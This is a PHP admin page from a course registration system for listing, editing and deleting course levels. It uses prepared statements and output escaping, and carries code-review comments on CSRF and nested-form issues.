<?php
	// Page bootstrap for the CES admin "Edit Level" screen: set the title, load the shared
	// helpers and configuration, enforce the login check, then emit the common admin heading.
	$page_title = "Edit Level | CES Admin";
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/common_functions.php"); //common functions in the course registration system
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/config.php"); //holds global config variables
 	check_if_authenticated('admin');//check if user is logged in; runs before the admin heading include below
	// NOTE(review): check_if_authenticated() is defined outside this file. Presumably 'admin' names the
	// required role and the call stops the request when the check fails - confirm, because every
	// database write further down this page relies on it as the only access control.
	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/top-admin.php"); //get the HTML heading common to all pages in the CES admin module
	
?>

 <article class="ces-admin">
        <h2>CES Admin - Edit Level</h2>


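<?php
	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/nav-admin.php");

	// Open the database connection. The four connection variables are not defined in this
	// file; presumably they come from the config.php include at the top of the page.
	$db = mysqli_connect($mysql_server, $user, $pass, $database);

	// NOTE(review): the update and delete handlers below change data on a plain POST, and no
	// anti-CSRF token is checked anywhere in this file. Confirm whether check_if_authenticated()
	// or a shared include covers that; if not, add a per-session token to both forms.

	// level_id comes straight from the request, so it is only ever handed to the database as a
	// bound parameter and is HTML-escaped before being echoed. Non-scalar input (level_id[]=...)
	// is treated as an empty id.
	$posted_level_id = (isset($_POST['level_id']) && is_scalar($_POST['level_id'])) ? (string) $_POST['level_id'] : '';

	if(isset($_POST['submit'])){ //form has been submitted, update database with new values

		$posted_description = (isset($_POST['level_description']) && is_scalar($_POST['level_description'])) ? (string) $_POST['level_description'] : '';

		// The description is still stored HTML-encoded, as before, so existing rows and readers
		// keep working. Encoding for HTML does nothing for SQL safety; the bound parameters do that.
		$level_description = htmlentities($posted_description, ENT_QUOTES);

		$sql = "UPDATE ces_levels SET level_description = ? WHERE level_id = ?";
		$update_stmt = $db ? mysqli_prepare($db, $sql) : false;

		if ($update_stmt
			&& mysqli_stmt_bind_param($update_stmt, 'ss', $level_description, $posted_level_id)
			&& mysqli_stmt_execute($update_stmt)) { //updates the database
			echo "<div class=courseMainHeading>Level updated successfully.</div>";
		}
		else {
			// Only the parameterised statement text is passed on, never the request values.
			print_sql_error('Error - could not update the level when trying to do:', $sql);
		}
		if ($update_stmt) {
			mysqli_stmt_close($update_stmt);
		}
	}
	if(isset($_POST['cancel'])){ //form has been canceled
		//do nothing
	}//if

	if(isset($_POST['delete'])){
		// The "Delete Unused Level" button is only rendered for levels with no courses, but a
		// hand-built POST can name any level. The NOT EXISTS clause enforces the same rule on the
		// server, in the same statement that performs the delete.
		$delete_level_sql = "DELETE FROM ces_levels WHERE level_id = ? AND NOT EXISTS (SELECT 1 FROM ces_courses WHERE ces_courses.level_id = ces_levels.level_id)";
		$delete_stmt = $db ? mysqli_prepare($db, $delete_level_sql) : false;

		if ($delete_stmt
			&& mysqli_stmt_bind_param($delete_stmt, 's', $posted_level_id)
			&& mysqli_stmt_execute($delete_stmt)) {
			if (mysqli_stmt_affected_rows($delete_stmt) > 0) {
				if ($posted_level_id !== ''){
					echo "<p class='alert alert-block alert-success'>Level # <em>".htmlspecialchars($posted_level_id, ENT_QUOTES, 'UTF-8')."</em> was deleted successfully</p>\n";
				}
				else{
					echo "<p class='alert alert-block alert-success'>The Level was deleted successfully</p>\n";
				}
			}
			else {
				// Nothing matched: report it instead of claiming a delete that did not happen.
				echo "<p class='alert alert-block alert-danger'>The Level was not deleted: it does not exist or is still used by a course.</p>\n";
			}
		}
		else {
			// The original ignored a failed delete; report it the same way a failed update is reported.
			print_sql_error('Error - could not delete the level when trying to do:', $delete_level_sql);
		}
		if ($delete_stmt) {
			mysqli_stmt_close($delete_stmt);
		}
	}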
	
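	if(isset($_GET['level_id'])){ //we can identify the record by its level_id; print out the record and allow updates

		// level_id comes from the query string: bind it as a parameter, never splice it into SQL.
		// Non-scalar input (level_id[]=...) is treated as an empty id and matches nothing.
		$requested_level_id = is_scalar($_GET['level_id']) ? (string) $_GET['level_id'] : '';

		// PHP_SELF includes any extra path info sent by the client, so escape it before it is
		// written into an HTML attribute.
		$self_url = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');

		// Read the matching rows into an array first so the connection is free for the
		// course-count query that runs while the form is rendered.
		$levels = array();
		$level_stmt = $db ? mysqli_prepare($db, "SELECT level_id, level_description FROM ces_levels WHERE level_id = ?") : false;
		if ($level_stmt
			&& mysqli_stmt_bind_param($level_stmt, 's', $requested_level_id)
			&& mysqli_stmt_execute($level_stmt)) {
			mysqli_stmt_store_result($level_stmt);
			mysqli_stmt_bind_result($level_stmt, $found_level_id, $found_level_description);
			while (mysqli_stmt_fetch($level_stmt)) {
				$levels[] = array('level_id' => $found_level_id, 'level_description' => $found_level_description);
			}
		}
		if ($level_stmt) {
			mysqli_stmt_close($level_stmt);
		}

		foreach ($levels as $query) {
			// The hidden field carries the id as stored in the database, not the raw request
			// value, so the update targets exactly the row that is displayed.
			$edit_level_id = (string) $query["level_id"];
			$safe_level_id = htmlspecialchars($edit_level_id, ENT_QUOTES, 'UTF-8');
			// Descriptions are stored HTML-encoded by the update handler; double_encode=false
			// leaves those entities alone and still neutralises any row stored without encoding.
			$safe_description = htmlspecialchars((string) $query["level_description"], ENT_QUOTES, 'UTF-8', false);
			?>

		<form method="post" action="<?php echo $self_url ?>">
			<input type='hidden' name='level_id' value="<?php echo $safe_level_id ?>">
			<div class="form-group">
				<label for="level_id">Level ID:</label>
				<input class="form-control" style="width:70px;" type='text' id='level_id' name='level_id' value="<?php echo $safe_level_id ?>" disabled>
			</div>
			<div class="form-group">
				<label for="level_description">Level Description:</label>
				<textarea class="form-control" rows='4' style="height:auto; resize:none;" name='level_description' wrap='soft' required autofocus placeholder="Level Description"><?php echo $safe_description ?></textarea>
			</div>
			
			<input type='submit' name='submit' value="Update Level" class="btn btn-lg btn-block ces-green-btn">

			<input type='submit' name='cancel' value="Cancel" class="btn btn-lg btn-block ces-orange-btn">

			<?php
			// Offer the delete button only when no course references this level. The count starts
			// as "unknown" so a failed query hides the button instead of showing it. Hiding the
			// button is a UI convenience only: the handler that performs the delete has to enforce
			// the same rule itself.
			$level_count = -1;
			$count_stmt = $db ? mysqli_prepare($db, "SELECT COUNT(*) FROM ces_courses WHERE level_id = ?") : false;
			if ($count_stmt
				&& mysqli_stmt_bind_param($count_stmt, 's', $edit_level_id)
				&& mysqli_stmt_execute($count_stmt)) {
				mysqli_stmt_bind_result($count_stmt, $counted_courses);
				if (mysqli_stmt_fetch($count_stmt) === true) {
					$level_count = (int) $counted_courses;
				}
			}
			if ($count_stmt) {
				mysqli_stmt_close($count_stmt);
			}
			if($level_count === 0){
				// NOTE(review): this opens a second <form> inside the one above, which HTML does not
				// allow; browsers typically ignore the inner tag, so the button submits the outer form.
				echo "\n<form  method='post' action='" . $self_url . "'>";
				echo '<input style="float:right;" class="btn btn-lg btn-block ces-grey-btn" type="submit" name="delete" value="Delete Unused Level" title="Delete Unused Level">';
				echo '<input type="hidden" name="level_id" value="'. $safe_level_id .'">';
				
			}

			?>
		</form>

		<?php

		} //foreach
		
	}//if
	
	else{ //output all the levels so we can pick which one to update	
		// PHP_SELF can carry client-supplied path info; escape it before building the edit links.
		$self_url = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');

		echo "\n<table class='table table-striped' border='0'>\n\t<thead><tr>";
		echo "\n\t<th>Level</th>";
		echo "\n\t<th>Description</th>";
		echo "\n\t<th># of Courses</th>";
		echo "\n\t<th></th>";
		echo "\n\t</tr></thead>";
		echo "\n\t<thead>";
	
		$level_sql = $db ? mysqli_query($db, "SELECT level_id, level_description FROM ces_levels ORDER BY level_id") : false;
		// One prepared statement is reused for every row's course count.
		$count_stmt = $db ? mysqli_prepare($db, "SELECT COUNT(*) FROM ces_courses WHERE level_id = ?") : false;
		$row_count = 0;
		while ($level_sql && ($query = mysqli_fetch_array($level_sql))) {
			//output the record in a table format
			$row_count++;
			$list_level_id = (string) $query["level_id"];

			echo "\n\t<tr class='" . output_row_stripe($row_count) . "'>\n";
			echo "\n\t<td>" . htmlspecialchars($list_level_id, ENT_QUOTES, 'UTF-8') . "</td>";
			// Escape before convert_line_returns() adds its own markup; double_encode=false keeps
			// the entities already stored by the update handler intact.
			// NOTE(review): convert_line_returns() is defined elsewhere - confirm it only turns line
			// breaks into markup, and that no description is meant to carry raw HTML.
			echo "\n\t<td>" . convert_line_returns(htmlspecialchars((string) $query["level_description"], ENT_QUOTES, 'UTF-8', false)) . "</td>";

			$level_count = '?'; // shown when the count query fails
			if ($count_stmt
				&& mysqli_stmt_bind_param($count_stmt, 's', $list_level_id)
				&& mysqli_stmt_execute($count_stmt)) {
				mysqli_stmt_store_result($count_stmt);
				mysqli_stmt_bind_result($count_stmt, $counted_courses);
				if (mysqli_stmt_fetch($count_stmt) === true) {
					$level_count = (int) $counted_courses;
				}
				mysqli_stmt_free_result($count_stmt); // release the result before the next execute
			}
			echo "\n\t<td>" . $level_count . "</td>";
			echo "\n\t<td class='ces-list-icons'><a href='" . $self_url . "?level_id=" . rawurlencode($list_level_id) . "' class='orange-icon'><span title='Edit Level' class='fa fa-edit fa-lg'></span></a></td>";
			echo "\n\t</tr>";
		} //while
		if ($count_stmt) {
			mysqli_stmt_close($count_stmt);
		}
		echo "\n\t</thead>";
		echo "\n</table>";
	}//else
	
?>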
 
  </article>
    


  </section><!-- #middle-->

</div><!-- #wrapper --> 
 
<?php // Shared site footer. require_once makes a missing footer file a fatal error instead of a warning.
require_once $_SERVER['DOCUMENT_ROOT'].'/require/footer.php';?>
